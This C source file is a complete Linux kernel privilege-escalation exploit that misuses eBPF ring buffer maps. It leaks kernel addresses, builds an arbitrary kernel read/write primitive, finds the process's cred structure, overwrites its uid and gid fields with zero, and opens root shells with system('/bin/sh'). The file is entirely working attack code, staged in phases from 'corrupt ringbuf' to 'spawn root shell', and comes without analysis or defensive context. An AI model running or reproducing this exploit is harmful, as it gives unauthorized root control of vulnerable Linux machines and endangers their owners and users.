#include <signal.h>
#include <sys/prctl.h>
#include <sys/wait.h>

#include "bpf.h"
#include "config.h"
#include "debug.h"
#include "helper.h"

typedef struct {
    u32 rand;

    int comm_fd;
    int array_fd;
    int ringbuf_fd;
    int ringbuf_next_fd;

    int ringbuf_fds[MAP_NUM];
    pid_t processes[PROC_NUM];

    kaddr_t ringbuf;
    kaddr_t ringbuf_pages;
    kaddr_t array_map;
    kaddr_t array_map_ops;
    kaddr_t task_struct;
    kaddr_t cred;

    union {
        u8 bytes[PAGE_SIZE*8];
        u16 words[0];
        u32 dwords[0];
        u64 qwords[0];
        kaddr_t ptrs[0];
    };
} context_t;

typedef struct {
    const char* name;
    int (*func)(context_t *ctx);
    int ignore_error;
} phase_t;

int create_bpf_maps(context_t *ctx)
{
    int ret = 0;

    ret = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(u32), PAGE_SIZE, 1);
    if (ret < 0) {
        WARNF("Failed to create comm map: %d (%s)", ret, strerror(-ret));
        return ret;
    }
    ctx->comm_fd = ret;

    for (int i = 0; i < MAP_NUM; i++)
    {
        if ((ret = bpf_create_map(BPF_MAP_TYPE_RINGBUF, 0, 0, PAGE_SIZE)) < 0) {
            WARNF("Could not create ringbuf map[%d]: %d (%s)", i, ret, strerror(-ret));
            return ret;
        }
        ctx->ringbuf_fds[i] = ret;
    }

    ctx->rand = urandom();

    u32 idx = (ctx->rand%(MAP_NUM - 1));
    ctx->ringbuf_fd = ctx->ringbuf_fds[idx];
    ctx->ringbuf_next_fd = ctx->ringbuf_fds[idx+1];

    DEBUGF("random = 0x%08x, idx = %d", ctx->rand, idx);

    return 0;
}

int spawn_processes(context_t *ctx)
{
    for (int i = 0; i < PROC_NUM; i++)
    {
        pid_t child = fork();
        if (child == 0) {
            if (prctl(PR_SET_NAME, __ID__, 0, 0, 0) != 0) {
                WARNF("Could not set name");
            }
            uid_t old = getuid();
            kill(getpid(), SIGSTOP);
            uid_t uid = getuid();
            if (uid == 0 && old != uid) {
                OKF("Enjoy root!");
                system("/bin/sh");
            }
            exit(uid);
        }
        if (child < 0) {
            return child;
        }
        ctx->processes[i] = child;
    }

    return 0;
}

int corrupt_ringbuf(context_t *ctx)
{
    struct bpf_insn insn[] = {
        // r0 = bpf_lookup_elem(ctx->comm_fd, 0)
        BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd),
        BPF_ST_MEM(BPF_W, BPF_REG_10, -4, 0),
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),

        // if (r0 == NULL) exit(1)
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, 1),
        BPF_EXIT_INSN(),

        // r9 = r0
        BPF_MOV64_REG(BPF_REG_9, BPF_REG_0),

        // r0 = bpf_ringbuf_reserve(ctx->ringbuf_fd, 0xff0, 0)
        BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd),
        BPF_MOV64_IMM(BPF_REG_2, 0xff0),
        BPF_MOV64_IMM(BPF_REG_3, 0x00),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve),

        // if (r0 == NULL) exit(2)
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, 2),
        BPF_EXIT_INSN(),

        // === Overwrite ringbuf's mask to 0x80000fff ===
        // r0 = BPF_FUNC_ringbuf_submit(r0-(0x3008-0x38), BPF_RB_NO_WAKEUP)
        BPF_ALU64_IMM(BPF_SUB, BPF_REG_0, (0x3008-0x38)),
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
        BPF_MOV64_IMM(BPF_REG_2, 1),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_submit),

        // r0 = bpf_ringbuf_reserve(ctx->ringbuf_fd, 0x4000-8, 0)
        BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd),
        BPF_MOV64_IMM(BPF_REG_2, 0x4000-8),
        BPF_MOV64_IMM(BPF_REG_3, 0x00),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve),

        // if (r0 == NULL) exit(3)
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, 3),
        BPF_EXIT_INSN(),

        // r6 = (struct ringbuf*)next
        BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 0x2000),
        BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_6, 0x30),

        // if ((struct ringbuf*)(next)->mask != 0xfff) exit(4);
        BPF_MOV64_IMM(BPF_REG_8, 0xfff),
        BPF_JMP_REG(BPF_JEQ, BPF_REG_7, BPF_REG_8, 6),
        // cleanup on error
        BPF_ALU64_IMM(BPF_SUB, BPF_REG_6, 0x2000),
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),
        BPF_MOV64_IMM(BPF_REG_2, 1),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_discard),
        BPF_MOV64_IMM(BPF_REG_0, 4),
        BPF_EXIT_INSN(),

        // We are lucky, do some leak and overwrite next->mask
        BPF_ST_MEM(BPF_W, BPF_REG_6, 0x30, 0xFFFFFFFE),
        BPF_ST_MEM(BPF_W, BPF_REG_6, 0x34, 0xFFFFFFFF),

        BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_6, 0x8), // ringbuf addr
        BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_1, 8),
        BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_6, 0x38), // ringbuf pages
        BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_1, 16),
        BPF_ST_MEM(BPF_DW, BPF_REG_9, 0x0, 0x13371337),

        // Clean up

        // r0 = bpf_ringbuf_discard(r6-0x2000, BPF_RB_NO_WAKEUP)
        BPF_ALU64_IMM(BPF_SUB, BPF_REG_6, 0x2000),
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),
        BPF_MOV64_IMM(BPF_REG_2, 1),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_discard),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN()
    };

    int prog = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, insn, sizeof(insn) / sizeof(insn[0]), "");
    if (prog < 0) {
        WARNF("Could not load program(corrupt_ringbuf):\n %s", bpf_log_buf);
        goto abort;
    }

    int err = bpf_prog_skb_run(prog, "TRIGGER", 8);
    if (err != 0) {
        WARNF("Could not run program(corrupt_ringbuf): %d (%s)", err, strerror(err));
        goto abort;
    }

    int key = 0;
    err = bpf_lookup_elem(ctx->comm_fd, &key, ctx->bytes);
    if (err != 0) {
        WARNF("Could not lookup comm map: %d (%s)", err, strerror(err));
        goto abort;
    }

    if (ctx->qwords[0] != 0x13371337) {
        WARNF("Could not leak kernel address. Try again if the kernel is vulnerable");
        goto abort;
    }

    ctx->ringbuf = ctx->ptrs[1] - 8;
    ctx->ringbuf_pages = ctx->ptrs[2];

    DEBUGF("ringbuf @ %p", ctx->ringbuf);
    DEBUGF("ringbuf pages @ %p", ctx->ringbuf_pages);

    return 0;

abort:
    if (prog > 0) close(prog);
    return -1;
}

// restricted_rw read(mode >= 0) or write(mode < 0) data with consequences (*kaddr = 0, *(kaddr-8) = bad_value).
int restricted_rw(context_t *ctx, kaddr_t kaddr, void* buf, u8 bpf_size, size_t count, int mode)
{
    int size = 0;
    switch (bpf_size)
    {
    case BPF_DW:
        size = 8;
        break;
    case BPF_W:
        size = 4;
        break;
    case BPF_H:
        size = 2;
        break;
    case BPF_B:
        size = 1;
        break;
    default:
        return -1;
    }

    int ret = -1;

    u64 delta = ctx->ringbuf_pages + 0x30 - (ctx->ringbuf + 0x3000 + 8);
    u64 offset = kaddr - (ctx->ringbuf_pages + 0x30);
    u64 tmp[PAGE_SIZE] = {};

    // DEBUGF("restricted_rw %s %p by %p + %p (delta %p)", mode>=0 ? "read":"write", (void*)kaddr, (void*)ctx->ringbuf_pages + 0x30, (void*)offset, (void*)delta);

    struct bpf_insn prefix[] = {
        // r0 = bpf_lookup_elem(ctx->comm_fd, 0)
        BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd),
        BPF_ST_MEM(BPF_W, BPF_REG_10, -4, 0),
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),

        // if (r0 == NULL) exit(1)
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, 1),
        BPF_EXIT_INSN(),

        // r9 = r0
        BPF_MOV64_REG(BPF_REG_9, BPF_REG_0),

        // r0 = bpf_ringbuf_reserve(ctx->ringbuf_fd, 0x5000-8, 0)
        BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd),
        BPF_MOV64_IMM(BPF_REG_2, 0x5000-8),
        BPF_MOV64_IMM(BPF_REG_3, 0x00),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve),

        // if (r0 == NULL) exit(2)
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, 2),
        BPF_EXIT_INSN(),

        // r8 = delta
        BPF_MOV32_IMM(BPF_REG_8, (u32)(delta>>32)),
        BPF_MOV32_IMM(BPF_REG_2, (u32)(delta&0xFFFFFFFF)),
        BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32),
        BPF_ALU64_REG(BPF_OR, BPF_REG_8, BPF_REG_2),

        // next->producer_pos = delta
        BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 0x4000),

        // r0 = bpf_ringbuf_discard(r0, BPF_RB_NO_WAKEUP)
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
        BPF_MOV64_IMM(BPF_REG_2, 1),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_discard),

        // r0 = bpf_ringbuf_reserve(ctx->ringbuf_next_fd, offset+PAGE_SIZE, 0) # point to ctx->ringbuf_pages + 0x30
        BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_next_fd),
        BPF_MOV64_IMM(BPF_REG_2, offset+PAGE_SIZE),
        BPF_MOV64_IMM(BPF_REG_3, 0x00),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve),

        // if (r0 == NULL) exit(3)
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, 3),
        BPF_EXIT_INSN(),

        // *r0 = 0x80000000
        BPF_MOV64_IMM(BPF_REG_1, 1),
        BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 31),
        BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_1, 0),

        // r0 += offset
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, (u32)(offset)),
    };

    struct bpf_insn suffix[] = {
        // r0 point to kaddr, we need to fix that before submit
        BPF_ALU64_IMM(BPF_SUB, BPF_REG_0, (u32)(offset)),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, 8),
        // r0 = bpf_ringbuf_submit(r0, BPF_RB_NO_WAKEUP)
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
        BPF_MOV64_IMM(BPF_REG_2, 1),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_submit),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    int prefix_cnt = sizeof(prefix)/sizeof(prefix[0]);
    int suffix_cnt = sizeof(suffix)/sizeof(suffix[0]);

    struct bpf_insn* insn = calloc(sizeof(struct bpf_insn), prefix_cnt + suffix_cnt + count*2);
    if (!insn) {
        WARNF("Failed to allocate insn buffer: out of memory");
        return -1;
    }

    struct bpf_insn* p = insn;

    memcpy(p, prefix, sizeof(prefix));

    p += prefix_cnt;
    
    u8 src = mode >= 0? BPF_REG_0 : BPF_REG_9;
    u8 dst = mode >= 0? BPF_REG_9 : BPF_REG_0;
    for (int i = 0; i < count; i++) {
        *p++ = BPF_LDX_MEM(bpf_size, BPF_REG_1, src, i*size);
        *p++ = BPF_STX_MEM(bpf_size, dst, BPF_REG_1, i*size);
    }

    memcpy(p, suffix, sizeof(suffix));

    int prog = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, insn, prefix_cnt + suffix_cnt + count*2, "");
    if (prog < 0) {
        WARNF("Failed to load program(read):\n %s", bpf_log_buf);
        goto abort;
    }

    int err = 0;

    if (mode < 0) {
        memcpy(tmp, buf, size*count);
        err = bpf_update_elem(ctx->comm_fd, &err, tmp, 0);
        if (err != 0) {
            WARNF("Failed to update comm map: %d (%s)", err, strerror(err));
            goto abort;
        }
    }

    if ((err = bpf_prog_skb_run(prog, "tr3e of SecCoder Security Lab", 30)) != 0) {
        WARNF("Failed to run program(read): %d (%s)", err, strerror(err));
        goto abort;
    }

    if (mode > 0) {
        err = bpf_lookup_elem(ctx->comm_fd, &err, tmp);
        if (err != 0) {
            WARNF("Failed to lookup comm map: %d (%s)", err, strerror(err));
            goto abort;
        }
        memcpy(buf, tmp, size*count);
    }

    ret = 0;

abort:
    if (prog > 0) close(prog);
    return ret;
}

int find_cred(context_t *ctx)
{
    kaddr_t kaddr = ctx->ringbuf_pages + 0x30;
    
    for (int i = 0; i < 2*PAGE_SIZE; i++)
    {
        if (restricted_rw(ctx, kaddr, ctx->bytes, BPF_DW, PAGE_SIZE/8, 1) != 0) {
            WARNF("Could not find task_struct from kernel vmalloc memory");
            goto abort;
        }
        u8 *tmp = ctx->bytes;
        size_t size = PAGE_SIZE;
        while(true) {
            int offset = memoff(tmp, size, __ID__, sizeof(__ID__));
            if (offset < 0) break;
            kaddr_t creds[2] = {};
            kaddr_t cred_from_task = kaddr + offset - 0x10;
            if (restricted_rw(ctx, cred_from_task, creds, BPF_DW, 2, 1) != 0) {
                WARNF("Could not read kernel address %p", cred_from_task);
                break;
            }
            // could be cred or cached_requested_key
            kaddr_t cred = creds[1] != NULL ? creds[1] : creds[0];
            DEBUGF("Found an candidate task %p, cred %p", cred_from_task, cred);
            if (cred != 0 && cred > ctx->ringbuf_pages && cred < ctx->ringbuf_pages + (1<<29)) {
                ctx->cred = cred;
                DEBUGF("task struct ~ %p", cred_from_task);
                DEBUGF("cred @ %p", ctx->cred);
                return 0;
            }
            tmp += offset + sizeof(__ID__);
            size -= offset + sizeof(__ID__);
        }
        kaddr += PAGE_SIZE;
    }

abort:
    return -1;
}

int overwrite_cred(context_t *ctx)
{
    u64 zero = 0;
    if (restricted_rw(ctx, ctx->cred + OFFSET_uid_from_cred, &zero, BPF_W, 1, -1) != 0) {
        return -1;
    }
    if (restricted_rw(ctx, ctx->cred + OFFSET_gid_from_cred, &zero, BPF_W, 1, -1) != 0) {
        return -1;
    }
    if (restricted_rw(ctx, ctx->cred + OFFSET_euid_from_cred, &zero, BPF_W, 1, -1) != 0) {
        return -1;
    }
    if (restricted_rw(ctx, ctx->cred + OFFSET_egid_from_cred, &zero, BPF_W, 1, -1) != 0) {
        return -1;
    }

    return 0;
}

int spawn_root_shell(context_t *ctx)
{
    for (int i = 0; i < PROC_NUM; i++)
    {
        kill(ctx->processes[i], SIGCONT);
    }
    while(wait(NULL) > 0);
    return 0;
}

int clean_up(context_t *ctx)
{
    close(ctx->comm_fd);
    for (int i = 0; i < MAP_NUM; i++)
    {
        if (ctx->ringbuf_fds[i]) close(ctx->ringbuf_fds[i]);
    }
    kill(0, SIGCONT);
    return 0;
}

phase_t phases[] = {
    { .name = "create bpf map(s)", .func = create_bpf_maps },
    { .name = "corrupt ringbuf", .func = corrupt_ringbuf },
    { .name = "spawn processes", .func = spawn_processes },
    { .name = "find cred (slow)", .func = find_cred },
    { .name = "overwrite cred", .func = overwrite_cred },
    { .name = "spawn root shell", .func = spawn_root_shell },
    { .name = "clean up the mess", .func = clean_up , .ignore_error = 1 },
};

int main(int argc, char** argv)
{
    context_t ctx = {};
    int err = 0;
    int max = sizeof(phases) / sizeof(phases[0]);
    if (getuid() == 0) {
        BADF("You are already root, exiting...");
        return -1;
    }
    for (int i = 1; i <= max; i++)
    {
        phase_t *phase = &phases[i-1];
        if (err != 0 && !phase->ignore_error) {
            ACTF("phase(%d/%d) '%s' skipped", i, max, phase->name);
            continue;
        }
        ACTF("phase(%d/%d) '%s' running", i, max, phase->name);
        int error = phase->func(&ctx);
        if (error != 0) {
            BADF("phase(%d/%d) '%s' return with error %d", i, max, phase->name, error);
            err = error;
        } else {
            OKF("phase(%d/%d) '%s' done", i, max, phase->name);
        }
    }
    return err;
}